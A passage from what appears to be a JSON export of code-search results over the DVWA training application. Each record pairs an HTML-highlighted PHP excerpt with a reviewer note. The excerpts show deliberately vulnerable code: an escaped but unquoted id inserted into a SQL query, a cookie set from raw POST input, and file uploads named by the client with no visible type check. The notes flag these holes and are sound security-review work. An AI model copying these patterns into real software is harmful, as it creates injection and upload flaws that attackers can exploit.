class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'id'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span 
class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Cookie ID set!&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\">&lt;</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;&lt;/script>\";</span>\n<span class=\"line-number\">15:</span> }\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
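  "note": "Line 12 sets the 'id' cookie straight from $_POST['id'] with no validation and passes no expiry, path or Secure/HttpOnly/SameSite options to setcookie(). Cookies are client-controlled in any case, so whatever later reads $_COOKIE['id'] must validate it (integer check) and use parameterized queries rather than trusting the stored value."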
 },
 {
  "id": 225,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
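  "note": "Presence check on the Submit field only; no request data is consumed on this line. The value to follow is 'id', read on line 5."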
 },
 {
  "id": 226,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$getid</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token variable\">$id</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span 
class=\"line-number\">10:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
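  "note": "'id' is passed through mysqli_real_escape_string() on line 6 but is then interpolated unquoted into the WHERE clause on line 9, so escaping does not confine it to a single value. Treat as SQL injection; fix with an integer check or a prepared statement."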
 },
 {
  "id": 256,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
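  "note": "Presence check on the Upload field only. The destination name on line 6 is the client-supplied file name passed through basename(); the checks under 'File information' fall outside this excerpt and need review."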
 },
 {
  "id": 261,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
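  "note": "Presence check on the Upload field only; no request data is consumed on this line. The next statement is the anti-CSRF checkToken() call."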
 },
 {
  "id": 268,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
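  "note": "Presence check on the Upload field only. In this excerpt the destination path is built from the client-supplied file name via basename() and the next step is already the move into the upload folder; no type or extension check is visible before it."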
 },
 {
  "id": 274,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
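  "note": "Presence check on the Upload field only. The destination name on line 6 is the client-supplied file name passed through basename(); the checks under 'File information' fall outside this excerpt and need review."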
 },
 {
  "id": 294,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
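  "note": "Presence check on the btnSign field only; no request data is consumed on this line. The values to follow are mtxMessage and txtName, read on lines 5 and 6."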
 },
 {
  "id": 295,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
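  "note": "mtxMessage is trimmed, then passed through strip_tags(addslashes()) and mysqli_real_escape_string() on lines 9 and 10. Any output encoding falls after line 10, outside this excerpt; confirm it is applied before the value is rendered."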
 },
 {
  "id": 296,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
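  "note": "txtName is only trimmed in this excerpt, while the message gets strip_tags(), escaping and htmlspecialchars() on lines 9 to 11. Check that the name receives equivalent output encoding further down."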
 },
 {
  "id": 298,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 299,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
